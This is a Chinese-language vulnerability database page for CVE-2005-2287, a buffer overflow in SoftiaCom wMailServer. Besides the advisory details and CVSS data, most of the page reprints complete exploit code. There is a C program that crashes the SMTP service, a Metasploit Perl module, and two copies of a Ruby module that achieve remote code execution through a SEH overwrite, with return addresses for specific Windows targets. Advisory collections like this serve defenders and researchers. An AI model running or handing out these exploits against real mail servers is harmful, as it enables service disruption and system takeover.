CVE-2005-2287
CVSS5.0
发布时间 :2005-07-18 00:00:00
修订时间 :2016-10-17 23:25:59
NMCOEP    

[原文]SoftiaCom wMailServer 1.0 and 2.0 allows remote attackers to cause a denial of service (application crash) via a large TCP packet with a leading space, possibly triggering a buffer overflow.


[CNNVD]SoftiaCom wMailServer 拒绝服务漏洞(CNNVD-200507-200)

        Softiacom wMailserver是一款用于Win平台的邮件服务软件。
        SoftiaCom wMailServer 1.0及2.0版本中存在拒绝服务漏洞。
        远程攻击者通过可能触发缓冲区溢出的具有前导空格的大型TCP数据包,可使系统拒绝服务(应用程序崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:softiacom:wmailserver:2.0
cpe:/a:softiacom:wmailserver:1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2287
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2287
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-200
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112122500308722&w=2
(UNKNOWN)  BUGTRAQ  20050712 SoftiaCom MailServer v2.0 - Denial Of Service

- 漏洞信息

SoftiaCom wMailServer 拒绝服务漏洞
中危 缓冲区溢出
2005-07-18 00:00:00 2005-10-20 00:00:00
远程  
        Softiacom wMailserver是一款用于Win平台的邮件服务软件。
        SoftiaCom wMailServer 1.0及2.0版本中存在拒绝服务漏洞。
        远程攻击者通过可能触发缓冲区溢出的具有前导空格的大型TCP数据包,可使系统拒绝服务(应用程序崩溃)。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.softiacom.com/

- 漏洞信息 (1101)

wMailServer 1.0 Remote Denial of Service Exploit (EDBID:1101)
windows dos
2005-07-12 Verified
0 Kozan
N/A [点击下载]
/*****************************************************************

wMailServer Remote D.o.S Exploit by Kozan

Application: wMailServer
Vendor: Softiacom Software - www.softiacom.com

Discovered by: fRoGGz - SecuBox Labs
Exploit Coded by: Kozan
Credits to ATmaCA, fRoGGz, SecuBox Labs
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

*****************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>

#pragma comment(lib,"ws2_32.lib")

char Buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

int main(int argc, char *argv[])
{
       fprintf(stdout, "wMailServer Remote D.o.S Exploit by Kozan\n");
       fprintf(stdout, "Discovered by: fRoGGz - SecuBox Labs\n");
       fprintf(stdout, "Exploit Coded by: Kozan\n");
       fprintf(stdout, "Credits to ATmaCA, fRoGGz, SecuBox Labs\n\n");
       fprintf(stdout, "www.spyinstructors.com - kozan@spyinstructors.com\n");

       if(argc<2)
       {
               fprintf(stderr, "\n\nUsage: %s [Target IP]\n\n", argv[0]);
               return -1;
       }
       WSADATA wsaData;
       SOCKET sock;

       if( WSAStartup(0x0101,&wsaData) < 0 )
       {
               fprintf(stderr, "Winsock error!\n");
               return -1;
       }

       sock = socket(AF_INET,SOCK_STREAM,0);
       if( sock == -1 )
       {
               fprintf(stderr, "Socket error!\n");
               return -1;
       }

       struct sockaddr_in addr;

       addr.sin_family = AF_INET;
       addr.sin_port = htons(25);
       addr.sin_addr.s_addr = inet_addr(argv[1]);
       memset(&(addr.sin_zero), '\0', 8);

       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
       {
               fprintf(stderr, "Connection failed!\n");
               closesocket(sock);
               return -1;
       }

       if( send(sock,Buff,strlen(Buff),0) == -1 )
       {
               fprintf(stderr, "DoS string could not sent!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Operation completed...\n");
       closesocket(sock);
       WSACleanup();

       return 0;
}

// milw0rm.com [2005-07-12]
		

- 漏洞信息 (1463)

SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (meta) (EDBID:1463)
windows remote
2006-02-01 Verified
21 y0
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::wmailserver_smtp;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {

	'Name'     => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
	'Version'  => '$Revision: 1.1 $',
	'Authors'  => [ 'y0 [at] w00t-shell.net', ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp' ],
	'Priv'  => 0,
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 25],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },
	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	'Payload' =>
	  {
		'Space'     => 600,
		'BadChars'  => "\x00\x0a\x0d\x20:=+\x22",
		'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
		'Keys'      => ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
	This module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)
	via a SEH frame overwrite.
}),

	'Refs'  =>
	  [
		['CVE', 'CAN-2005-2287'],
		['BID', '14213'],
	  ],
	'Targets' =>
	  [
		['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],
		['Windows 2000 English ALL', 0x75022ac4],
		['Windows XP English SP0/SP1', 0x71aa32ad],
	  ],
	'Keys' => ['smtp'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	if (! $self->InitNops(128)) {
		$self->PrintLine("[*] Failed to initialize the nop module.");
		return;
	}

	my $splat  = Pex::Text::UpperCaseText(5117);

	my $sploit =
	  " ". $splat. "\xeb\x06". pack('V', $target->[1]).
	  $shellcode. "\r\n\r\n";

	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($sploit);
	$self->Handler($s);
	$s->Close();
	return;
}

1;

# milw0rm.com [2006-02-01]
		

- 漏洞信息 (16819)

SoftiaCom WMailserver 1.0 Buffer Overflow (EDBID:16819)
windows remote
2010-05-09 Verified
25 metasploit
N/A [点击下载]
##
# $Id: wmailserver.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SoftiaCom WMailserver 1.0 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0
				(SMTP) via a SEH frame overwrite.
			},
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-2287' ],
					[ 'OSVDB', '17883' ],
					[ 'BID', '14213' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Platform'       => 'win',
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x0a\x0d\x20",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English All',   		{ 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', 		{ 'Ret' => 0x71aa32ad } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jul 11 2005 '))

		register_options([ Opt::RPORT(25) ], self.class)
	end

	def exploit
		connect

		filler = " " + rand_text_alpha_upper(5115)
		seh = generate_seh_payload(target.ret)
		sploit = filler + seh + rand_text_alpha_upper(200)

		print_status("Trying target #{target.name}...")
		sock.put(sploit + "\r\n\r\n")

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83132)

SoftiaCom WMailserver 1.0 Buffer Overflow (PacketStormID:F83132)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2005-2287
[点击下载]

This Metasploit module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP) via a SEH frame overwrite.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'SoftiaCom WMailserver 1.0 Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in SoftiaCom WMailserver 1.0
				(SMTP) via a SEH frame overwrite.	
			},
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-2287' ],
					[ 'OSVDB', '17883' ],
					[ 'BID', '14213' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Platform'       => 'win',
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x0a\x0d\x20",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Targets'        => 
				[
					[ 'Windows 2000 Pro English All',   		{ 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', 		{ 'Ret' => 0x71aa32ad } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jul 11 2005 '))

			register_options([ Opt::RPORT(25) ], self.class)
	end

	def exploit
		connect
	
		filler = " " + rand_text_alpha_upper(5115)
		seh = generate_seh_payload(target.ret)
		sploit = filler + seh + rand_text_alpha_upper(200) 
	
		print_status("Trying target #{target.name}...")	
		sock.put(sploit + "\r\n\r\n")
		
		handler
		disconnect
	end

end
    

- 漏洞信息

17883
wMailserver SMTP Service Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

wMailserver contains a flaw that may allow a remote denial of service. The issue is triggered when sending approximately 539 characters to the SMTP service, and will result in loss of availability for the service

- 时间线

2005-07-12 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站